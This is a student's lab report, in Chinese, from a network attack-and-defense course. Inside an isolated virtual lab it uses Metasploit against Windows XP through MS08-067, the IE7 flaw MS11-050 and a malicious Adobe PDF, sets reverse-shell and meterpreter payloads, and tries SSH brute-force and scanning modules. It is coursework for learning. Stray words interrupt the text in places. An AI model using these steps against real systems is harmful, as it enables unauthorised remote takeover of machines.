20145238-荊玉茗《網絡對抗技術》MSF基礎應用

20145238荊玉茗-《網絡攻防》-MSF基礎應用

實踐過程

MS08_067漏洞滲透攻擊實踐(主動攻擊)

實驗工具:

  • kali&windows xp
  • 將xp的網絡設爲NAT模式,再從新分配其ip地址與kali在同一網段,能夠看到兩臺虛擬機能夠ping通。

MS08_067遠程漏洞攻擊

  • 打開msf監聽
  • 查找關於ms08_067的滲透模塊
    html

  • 使用它有的這個exploit/windows/smb/ms08_067_netapi
  • 顯示攻擊載荷,能夠用這個shell_bind_tcp

    shell

  • show targets看一下能夠被攻擊的靶機的操做系統
  • 使用set payload generic/shell_reverse_tcp設置攻擊有效載荷。
  • 查看當前設置,要將RHOST設置爲XP的IP;將LHOST設爲kali的IP
    set LHOST "kali Ip" set RHOST "Win xp Ip"
    windows

  • 以後exploit能夠獲取其shellapi

回到ms08_067_netapi模塊界面瀏覽器

  • 此次將payload設爲meterpreterset payload windows/meterpreter/reverse_tcp
  • show options
  • exploit
    一樣能夠獲取靶機權限

IE瀏覽器滲透攻擊——MS11050安全漏洞(針對瀏覽器)

實驗工具:

  • kali&windows xp(使用瀏覽器爲IE7)
  • xp的ip地址爲192.168.228.130

實驗步驟:

  • 在kali中開啓msfconsole
  • 進入該漏洞use windows/browser/ms11_050_mshtml_cobjectelement
  • 可查看信息info以及目標瀏覽器targets
    安全

  • 設置meterpreter載荷set payload windows/meterpreter/reverse_tcp
  • show options(將LHOST設爲kali的IP、set LPORT xxx set URIPATH xxx)
    網絡

  • 完成exploitXP訪問底下的網址

    session

  • 此時kali中session已建立
    ssh

  • 使用命令sessions -i 1開始鏈接,併成功獲得shell
    tcp

Adobe閱讀器滲透攻擊

實驗工具:

  • kali&Win xp attacker
  • 均設爲NAT模式,確保可以ping通。
  • 打開kali中的隱藏文件

實驗步驟:

  • 在kali終端中開啓msfconsole
  • 進入該漏洞use exploit/windows/fileformat/adobe_cooltype_sing
  • 設置攻擊有效載荷set payload windows/meterpreter/reverse_tcp
  • show options

set FILENAME xxx.pdf
set LHOST "KALI Ip"
set LPORT xxxx

  • 設置相關信息

  • 生成其pdf,將pdf拷貝到靶機中

  • 使用命令exploit開始攻擊,在xp中打開pdf。
    此時kali中能夠看見
    已成功奪權

  • 看看靶機裏的tcp鏈接

應用輔助模塊

  • 使用show auxiliary查看輔助模塊

  • 我首先選擇了這個漏洞,百度以後是進行遠程ssl帳號口令的破解。
    首先使用use auxiliary/scanner/ssh/ssh_login

  • 查看其配置信息(還配置了pass.txt,和user.txt)

  • 可是run以後一直出錯

(百度說Windows下msf安裝好之後,直接把生成好的pass.txt和user.txt放到X:\Program Files\Metasploit\Framework3\msf3\目錄下,直接放到c:\下面不行 只能放到msf3目錄下,我覺得直接把生成的文件拷貝過去就行,首先我沒找到生成的文件...而後我把ip改成kali的,仍是報錯)

  • 仍是看一下scanner/http/ssl

  • 咱們更改了目標主機設爲同一網段的,再次掃描...未果
    又更改了其線程...仍未果

  • 仍是作最容易的nmap掃面,看看其開放端口吧

  • 仍是不太甘心,又作了一下arp_sweep
    填好其設置信息之後使用run 開始掃描。可看到鏈接狀況。

實驗後回答問題

(1)用本身的話解釋什麼是exploit,payload,encode.

  • exploit:就是發起滲透攻擊,當你能夠得到靶機shell或者作一些奪權的準備以後的最後一個run。
  • payload就是咱們在作滲透攻擊中用到的shellcode,能夠破壞程序正常運行的代碼。
  • encode假裝病毒的一種手段——編碼

實驗總結與體會

經過本次實驗,我首先掌握了經過msf如何查看各類各樣的安全漏洞,再經過一個漏洞的分類進行攻擊。大體步驟爲:

  • 肯定你想嘗試的漏洞show auxiliary
  • 搜索該漏洞的模塊search xxx(能夠看到分別表示的模塊類型、目標平臺、目標服務、模塊名字)
  • show payloads可查看攻擊載荷的類型,選擇運行後門
  • show options查看配設滲透攻擊所須要的配置選項。yes爲必須配設的經過set xxx xxxx來配設
  • 重要的一點是這些漏洞都很是具備針對性、因此必定要show targets來看看相應的受害者是啥
  • 配置完各個選項之後再show options確認一下
  • 以後就能夠exploit發起進攻。

本次實驗難度方面不是特別大,主要考察你虛擬機能不能行,哎,一直在百分之93的狀態下作完了實驗,最後也分不清0 8 和o 了。。。

相關文章
相關標籤/搜索